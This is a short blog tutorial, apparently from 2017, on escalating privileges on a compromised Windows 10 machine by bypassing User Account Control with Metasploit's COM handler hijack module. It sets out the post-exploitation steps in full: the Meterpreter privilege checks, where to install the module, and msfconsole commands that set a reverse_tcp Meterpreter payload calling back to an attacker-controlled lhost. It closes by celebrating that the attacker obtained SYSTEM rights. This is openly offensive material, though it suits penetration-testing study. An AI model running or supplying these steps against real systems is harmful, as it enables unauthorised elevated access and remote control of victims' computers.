Bypass UAC in Windows 10 using bypass_comhijack Exploit

at 9:17 AM Saturday, August 12, 2017
In this article we are going to bypass User Access Control (UAC) in targeted system. It is the post exploitation; hence attacker must exploit target system at first then escalate UAC Protection Bypass via COM Handler Hijack.

Let’s start!!

Attacker: Kali Linux
Target: window 10

Firstly exploit the target to receive meterpreter session of victim’s system. Once you get the meterpreter session 1 then type following command to check system authority and privileges.

getuid
getprivs

From given image you can perceive that attacker is inside the meterpreter shell of victim’s system but don’t have system/admin authorities and privileges. Hence here we need to bypass UAC Protection of targeted system.


To perform this attack you need to manually add bypass_comhijack exploit inside metasploit framework.


Copy the entire content of “bypass_comhijack” from here and past it in a text document, now save as bypass_comhijack.rb inside the following path:

usr>share>metasploit_framework>modules>exploit>windows>local

From given image you can observe bypass_comhijack.rb exploit has been saved, as attacker has his meterpreter session therefore now he can use this exploit in order to bypass UAC protection.


This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entire are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated sessions. Registry key modifications are cleaned up after payload invocation.

Use exploit/windows/local/bypassuac_comhijack
Msf exploit (bypassuac_comhijack) > set payload window/x64/meterpreter/reverse_tcp
Msf exploit (bypassuac_comhijack) > set session 2
Msf exploit (bypassuac_comhijack) > set lhost 192.168.0.20
Msf exploit (bypassuac_comhijack) > exploit

From given image you can observe that meterpreter session 3 opened, now type following command to determine system authority privileges.

getsystem
getprivs

Wonderful!! Attacker got system/admin authorities and privileges.

Labels: ,

0 comments:

Post a Comment

Subscribe to: Post Comments (Atom)